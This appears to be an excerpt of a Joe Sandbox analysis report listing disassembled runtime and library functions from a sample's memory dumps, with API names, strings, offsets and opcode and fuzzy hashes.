                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Arg_$KeywordsModuleModule_PositionalStateType_
                                                                                                                                                                                                      • String ID: BZ2Decompressor
                                                                                                                                                                                                      • API String ID: 2980520244-1337346095
                                                                                                                                                                                                      • Opcode ID: afed0f35918e07c7ed392c872454de98ee5c60d2288c0fb2d16eeed887e30540
                                                                                                                                                                                                      • Instruction ID: 3d76b7d10c1d02cd531544358762cf3ee222a2b173a0ad7698b91ac6ad589791
                                                                                                                                                                                                      • Opcode Fuzzy Hash: afed0f35918e07c7ed392c872454de98ee5c60d2288c0fb2d16eeed887e30540
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B21E5A3A09A8691EA508F2EEC40579A7B4FB44B94F488032DF4E47774DE7CEC95C308
                                                                                                                                                                                                      Function 00007FF7FF599AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                      • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                      • Instruction ID: 4cbbaa73a43a3f4b39e91f011e3df131ced85e44cc30110a830a55516fbd4564
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AF04F61A09B8691EB24AF24A4553BAA721AF45761F940335C67E471F4DF2CD05583E0
                                                                                                                                                                                                      Function 00007FF7FF5A93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                      • Instruction ID: 373582d56bc14f5b79f989221e51d831d5d5636bbf65fbbd04a4fb52ef9f3c97
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F11BF62E4EEF701F7543924D4963F5A0447F58360F840734EBBE872D68E2CA861C1A0
                                                                                                                                                                                                      Function 00007FF7FF59B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B41F
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B43E
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B466
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B477
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B488
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                      • Opcode ID: ccac5f17aa91da4f3bae42de7e7333904383ed8f97faa160faf07aaa8124ee46
                                                                                                                                                                                                      • Instruction ID: 21f75c244663fa12a2c73b7ceab3ba02b868ae5af6446711379f7e5035b369d9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccac5f17aa91da4f3bae42de7e7333904383ed8f97faa160faf07aaa8124ee46
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49114C20A0DAC642FB7CB72556511F9E2865F847B0FD88334E93E576E6DE2CE50293A0
                                                                                                                                                                                                      Function 00007FFBBB612928 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dealloc$Module_State
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3434497292-0
                                                                                                                                                                                                      • Opcode ID: c2701d65d8635c800b2368b5dae6d5e2904f33743157c36a0849544e439b2f51
                                                                                                                                                                                                      • Instruction ID: af0cabf6268e3699505798e367be3c53774dc92a35196f248a82809b66184d3b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2701d65d8635c800b2368b5dae6d5e2904f33743157c36a0849544e439b2f51
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E121C3B2D1AA0A85FB594F7EDC14338B2A0BF54B15F18A931C70F452B08F6DAC828749
                                                                                                                                                                                                      Function 00007FF7FF59B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                      • Opcode ID: 189bd32c29972b75cbfb961d88c763c1323b9a0b7d58335ae669547dde4e0126
                                                                                                                                                                                                      • Instruction ID: 316882c0d52f0d42a96982b0d06deb3e468641e184b38baeaf343e5116f1fc3b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 189bd32c29972b75cbfb961d88c763c1323b9a0b7d58335ae669547dde4e0126
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92112A24E0928B52FB7CB36544521FDA1858F46770FD88738D93E5B2E2DD2CB50142F1
                                                                                                                                                                                                      Function 00007FFBBB639E60 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Module_$FromModuleSpecTypeType_$State
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1138651315-0
                                                                                                                                                                                                      • Opcode ID: ec3a0373053720cebc4d7731e40fe1f8f9fc4326cfe36c4b6aa1d52bed026cc4
                                                                                                                                                                                                      • Instruction ID: f572afe00a486fb3a6a2c7bc099c03fe0775f95abf0df4fc30fe36de4e917d7d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec3a0373053720cebc4d7731e40fe1f8f9fc4326cfe36c4b6aa1d52bed026cc4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41014062B19B4282EA148B3EED4463AA3A0FF49BC0B449034DF5F47BA4DF2CE954C704
                                                                                                                                                                                                      Function 00007FF7FF596010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: verbose
                                                                                                                                                                                                      • API String ID: 3215553584-579935070
                                                                                                                                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                      • Instruction ID: 50e1d1209a7165d453bee2a0231e885041ac78346e44468ad3a2f770e2c18d7e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C491B132A08A8685FB79AF24D4507BDB791AB40B94FC44336DA79473D5DF3CE40A83A1
                                                                                                                                                                                                      Function 00007FF7FF59FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                                                                                                                      • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                      • Instruction ID: 099db035078488b178ef4e75341e2ff237f372823fdb75a7423a4ba6f501a310
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9881C432E0C2C286F7BC6F2581102F8B6E0AB51748FD99235DA39972C5DF2DE90183E1
                                                                                                                                                                                                      Function 00007FFBBB632358 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 175COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func
                                                                                                                                                                                                      • String ID: block %d: crc = 0x%08x, combined CRC = 0x%08x, size = %d$ final combined CRC = 0x%08x
                                                                                                                                                                                                      • API String ID: 711238415-3357347091
                                                                                                                                                                                                      • Opcode ID: f92f81069268f452d2bc39fb51a334a3de6d6541b7d8f5fa574193166bce348c
                                                                                                                                                                                                      • Instruction ID: 7d8c6a0623b099631f9a3d73cc211cab5842a35c6efb82d1b05207642395eb35
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f92f81069268f452d2bc39fb51a334a3de6d6541b7d8f5fa574193166bce348c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 666170A7B1A61646E620AF3EE8056A9B350FB85F84F549035DF0B07766CF7DE802CB44
                                                                                                                                                                                                      Function 00007FF7FF58D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                                                                                                                      • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                      • Instruction ID: d489551160167ab9b0a6567a1cfcfaaeeb678087ee9f8f5455c1602c2fa9376d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D51A232B196818ADB14AF15E044BB8A7D1FB44B98F914230DA7D877C8EF3CE845CB90
                                                                                                                                                                                                      Function 00007FFBBCD4E720 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                                                                                                                      • Opcode ID: b6877663b72478c921046e8b62552550de42e283109204e7406cf9fbc6b57853
                                                                                                                                                                                                      • Instruction ID: 60545f858aa65fd9ca9168f6b2333019c5f805f4338b4330fb18e3e9f9121f98
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6877663b72478c921046e8b62552550de42e283109204e7406cf9fbc6b57853
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E051C4FAB196029AEB54CB29E048638B791FB84B98F544139DB4E47B88DF7CE941C704
                                                                                                                                                                                                      Function 00007FF7FF58EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                      • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                      • Instruction ID: 17ab65d3ae5609a70c0cdbac56963b814ad9c94e18f717db7be9dd65e50831d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1561B432908BC586D760AB15E4407EAFBA0FB89784F444325EBAD07B95DF7CD191CB50
                                                                                                                                                                                                      Function 00007FF7FF58F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                                                      • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                      • Instruction ID: 6ed6950d718bc4685e13a8d95892edc7af1d3145f7b4974e79e59d24daaf7f10
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26518E329086C286EB64AE2194443A8B6E0FB59B94F944336EABD47BD5CF3CE450C791
                                                                                                                                                                                                      Function 00007FFBBCD434E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
